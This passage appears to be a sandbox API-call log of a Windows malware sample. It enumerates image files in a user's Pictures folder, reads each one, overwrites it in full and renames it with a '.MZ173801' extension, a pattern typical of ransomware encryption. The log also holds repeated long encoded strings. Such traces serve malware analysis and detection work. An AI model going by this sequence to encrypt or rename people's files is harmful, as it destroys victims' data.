QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0114.723] GetCurrentThreadId () returned 0x1358 [0114.723] GetCurrentThreadId () returned 0x1358 [0114.723] GetCurrentThreadId () returned 0x1358 [0114.723] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0114.723] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0114.724] GetCurrentThreadId () returned 0x1358 [0114.724] GetCurrentThreadId () returned 0x1358 [0114.724] GetCurrentThreadId () returned 0x1358 [0114.724] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\SFUO7aG.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\sfuo7ag.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f8 [0114.724] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0114.724] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0114.724] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x17f17 [0114.724] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0114.724] ReadFile (in: hFile=0x3f8, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x17f17, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x17f17, lpOverlapped=0x0) returned 1 [0114.726] CloseHandle (hObject=0x3f8) returned 1 [0114.727] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\SFUO7aG.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\sfuo7ag.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f8 [0114.729] WriteFile (in: hFile=0x3f8, lpBuffer=0x23c2ad0*, nNumberOfBytesToWrite=0x17f17, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x23c2ad0*, lpNumberOfBytesWritten=0x19f9bc*=0x17f17, lpOverlapped=0x0) returned 1 [0114.731] CloseHandle (hObject=0x3f8) returned 1 [0114.733] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\SFUO7aG.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\sfuo7ag.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\SFUO7aG.bmp.MZ173801" (normalized: "c:\\users\\fd1hvy\\pictures\\sfuo7ag.bmp.mz173801")) returned 1 [0114.734] GetCurrentThreadId () returned 0x1358 [0114.734] GetCurrentThreadId () returned 0x1358 [0114.734] GetCurrentThreadId () returned 0x1358 [0114.734] GetCurrentThreadId () returned 0x1358 [0114.734] GetCurrentThreadId () returned 0x1358 [0114.734] GetCurrentThreadId () returned 0x1358 [0114.734] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd66ab930, ftCreationTime.dwHighDateTime=0x1d5ed51, ftLastAccessTime.dwLowDateTime=0x35dba9f0, ftLastAccessTime.dwHighDateTime=0x1d5e407, ftLastWriteTime.dwLowDateTime=0x35dba9f0, ftLastWriteTime.dwHighDateTime=0x1d5e407, nFileSizeHigh=0x0, nFileSizeLow=0x5926, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="uIWVa_KOKpq1AQ.gif", cAlternateFileName="UIWVA_~1.GIF")) returned 1 [0114.734] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0114.734] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0114.734] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\uIWVa_KOKpq1AQ.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\uiwva_kokpq1aq.gif"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd66ab930, ftCreationTime.dwHighDateTime=0x1d5ed51, ftLastAccessTime.dwLowDateTime=0x35dba9f0, ftLastAccessTime.dwHighDateTime=0x1d5e407, ftLastWriteTime.dwLowDateTime=0x35dba9f0, ftLastWriteTime.dwHighDateTime=0x1d5e407, nFileSizeHigh=0x0, nFileSizeLow=0x5926)) returned 1 [0114.735] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0114.735] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0114.735] GetCurrentThreadId () returned 0x1358 [0114.735] GetCurrentThreadId () returned 0x1358 [0114.735] GetCurrentThreadId () returned 0x1358 [0114.736] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0114.736] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0114.736] GetCurrentThreadId () returned 0x1358 [0114.736] GetCurrentThreadId () returned 0x1358 [0114.736] GetCurrentThreadId () returned 0x1358 [0114.736] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\uIWVa_KOKpq1AQ.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\uiwva_kokpq1aq.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f8 [0114.737] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0114.737] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0114.737] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x5926 [0114.737] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0114.737] ReadFile (in: hFile=0x3f8, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x5926, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x5926, lpOverlapped=0x0) returned 1 [0114.738] CloseHandle (hObject=0x3f8) returned 1 [0114.738] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\uIWVa_KOKpq1AQ.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\uiwva_kokpq1aq.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f8 [0114.739] WriteFile (in: hFile=0x3f8, lpBuffer=0x2437b60*, nNumberOfBytesToWrite=0x5926, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2437b60*, lpNumberOfBytesWritten=0x19f9bc*=0x5926, lpOverlapped=0x0) returned 1 [0114.740] CloseHandle (hObject=0x3f8) returned 1 [0114.977] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\uIWVa_KOKpq1AQ.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\uiwva_kokpq1aq.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\uIWVa_KOKpq1AQ.gif.MZ173801" (normalized: "c:\\users\\fd1hvy\\pictures\\uiwva_kokpq1aq.gif.mz173801")) returned 1 [0114.978] GetCurrentThreadId () returned 0x1358 [0114.978] GetCurrentThreadId () returned 0x1358 [0114.978] GetCurrentThreadId () returned 0x1358 [0114.978] GetCurrentThreadId () returned 0x1358 [0114.978] GetCurrentThreadId () returned 0x1358 [0114.978] GetCurrentThreadId () returned 0x1358 [0114.978] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1bad1db0, ftCreationTime.dwHighDateTime=0x1d5ebf6, ftLastAccessTime.dwLowDateTime=0x6f5623b0, ftLastAccessTime.dwHighDateTime=0x1d5ed15, ftLastWriteTime.dwLowDateTime=0x6f5623b0, ftLastWriteTime.dwHighDateTime=0x1d5ed15, nFileSizeHigh=0x0, nFileSizeLow=0x7a7, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="uoWC-.jpg", cAlternateFileName="")) returned 1 [0114.978] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0114.978] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0114.978] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\uoWC-.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\uowc-.jpg"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1bad1db0, ftCreationTime.dwHighDateTime=0x1d5ebf6, ftLastAccessTime.dwLowDateTime=0x6f5623b0, ftLastAccessTime.dwHighDateTime=0x1d5ed15, ftLastWriteTime.dwLowDateTime=0x6f5623b0, ftLastWriteTime.dwHighDateTime=0x1d5ed15, nFileSizeHigh=0x0, nFileSizeLow=0x7a7)) returned 1 [0114.979] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 